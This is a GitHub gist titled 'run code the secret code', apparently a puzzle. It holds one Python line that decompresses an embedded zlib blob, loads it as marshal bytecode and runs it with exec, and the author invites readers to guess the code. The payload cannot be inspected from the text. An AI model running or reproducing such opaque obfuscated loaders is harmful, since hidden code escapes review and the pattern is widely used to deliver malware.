Skip to content

Instantly share code, notes, and snippets.

@jjhesk
Last active September 23, 2023 16:32
Show Gist options
  • Save jjhesk/2c232cb2c20fb76ada15fbb520d69825 to your computer and use it in GitHub Desktop.
Save jjhesk/2c232cb2c20fb76ada15fbb520d69825 to your computer and use it in GitHub Desktop.
run code the secret code
from marshal import loads
import zlib
exec(loads(zlib.decompress(b'x\x9c\xbd\x92\xcfK\x1bA\x14\xc7gfgwcZ\x13\xab\x85ZZJ\xac\x14\xd9\x83\xd26\x05\xa1\x88x(\xd56\x92\xb6\x88\xa5\x08eI3\x1b\x9b\xb2?\xcal""IY\x8a\xe0\x0f,\xb4\x87\xa2GO\x82x\xe9\xa5\xd0c\xff\x04\x039\x84\x85\x9e<yK\xd1C\xf1\xd47\xbb\xae&\xd5^Mf\xbfo&y\xf3\xbe\x9fy;{\xa8\xe5#\x1f\xc7\x83\x87 \xeb\x88!\x86Md\xe1\x19\x8c\x11A\x06\x81\x073\xb2\x85\x11\xda\xc1\xd1\x96\xf6\x15FL\x9aB\x1a\xdd\x17\x0b\r\xfb\xb2\xe9\xe4\x98\xebNP\x84\xf6.\xc2(#\xfdcD#\xa3[-F3\x88\x110\x90\x0cR\xa0\x8c.\xd2\x19\x89a(&\x07\xc5\xb2\xbe\xaa\xeb\xdc)\xdb\xccW\xb8Q*s;\x8f[\n\nrI\x14\xfc\x08\xb2D\x97d(\x8aWeFV)\xc3U(Z%\xa5\x96\xfcw\'\xf3\n\xa9\xa0\x85s\xce\xb1L\x97\xe5\x02\x01\x8cXI>\xdd\xc7\xe4\n\xde"\x90I\xa2_\x1e\xa1-\xd0\x9d\x93\x8c\xaaT\x11\x1dP\xb2\xfbqX\xed_\x051\x05\xd8\xb3\xe2\xcb\xb4L\xdb\x98\x15xz\xa2n\x7f%\xebh\x16U\xd0\xebkU|>\xe9\x8a\xb4B\xda\xbd\xbf\x90\xb5\xde)\xb4\x8d4\x02=\xc9\xd9\xcc\xb1|U\xc4\xa2]\xd2\xa8O\x86\xee\xfa\xb8\xe8+\xban[\xb9\xf90\x16mW\xb4>\x95\xf2<_5\x8d9\xc3\xd4\xef\x1d\xc5G\xcc\xa2[\xca;\xd6\xfb\xd1\x85>\xd71\xe7\x8c\xb0\xd1\xfa\xfc\xd0\x88\xe9\xe4s\xa6;:t\x9a"\x8e\xe5\xde\x01\xf9\xe3\xa1\xdd\xc4d8\xbe\xf5}\x9a[\xfb\xb0Q\xd8,\xd4\x92\x83\xf5\xe4\xe0\xc9\x1f\x07\x82\x93\x0bbM\xe2b\xabO]\xc3`\xbe\x0c\x9c\xb3\x86\xa6p\xd1\x1b?\xae\xebyp,\xe9v\xde\x8f\x01\'\xa4@\x8ej\x97\xad7\x06wyB\xd4H\n_%\x80O\xa5\xc6\xc6x\x97\xd8\xd8\xd9\x86\xcb{\x8f\xaf\x96\xfbJ\xf0\x01`\xa33\xe9=\x0e\xe5J\x8f\xf7\xb4\x91\xbc\xe9M\xfc\xa2\xf1\xc5\xcc\xe7\xd8\xc6p\xad\xebv\x8d\xf6\xd7i\xff.\xedoD\xc0\xe1\xf8^\xfe\xf1\xe2g\xbc6\x9c\xa9\x0fg`YKL\xd6\x13\x93\xdex\xe3R\xb7\x97\xe5\xdd\xe244<\x8d\x04\xbd\xf6\xa9hN`\xce;\x84\x88\x84\x80\xef(6b9\xacl\x1a\xa3\xfcFp\xab\x00M\xbc\xec\xa6\x841n\xa0N/\xf86\x15\x15\xf7l\xa4\x9b\x08\xc2\xe6\x83 \xfcW\x82\xdaYM\xf2U+\xc7\xdd\xb793l 5\xe6\x8d\xfc6\n\xba\x1d\xbd\xd8\xfb-\xee\x1d\x91\xfb\xf3S\xf7\xeb\xbb\xed\xa3\x81\xa8G\xbdio\xba\x89\xd0\xe5\xf1\x81\xdfpA\'\x06\x0e\x03\x859~"\xe6\xa0\xcd3\xca\xd5\x8ba2\xd3\x82\xc9J\x1f\x06*\x98l1\x07m\x9e\xd1\x80\xe9/.T2\xf1')))
@jjhesk
Copy link
Author

jjhesk commented Sep 23, 2023

please guess the code

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment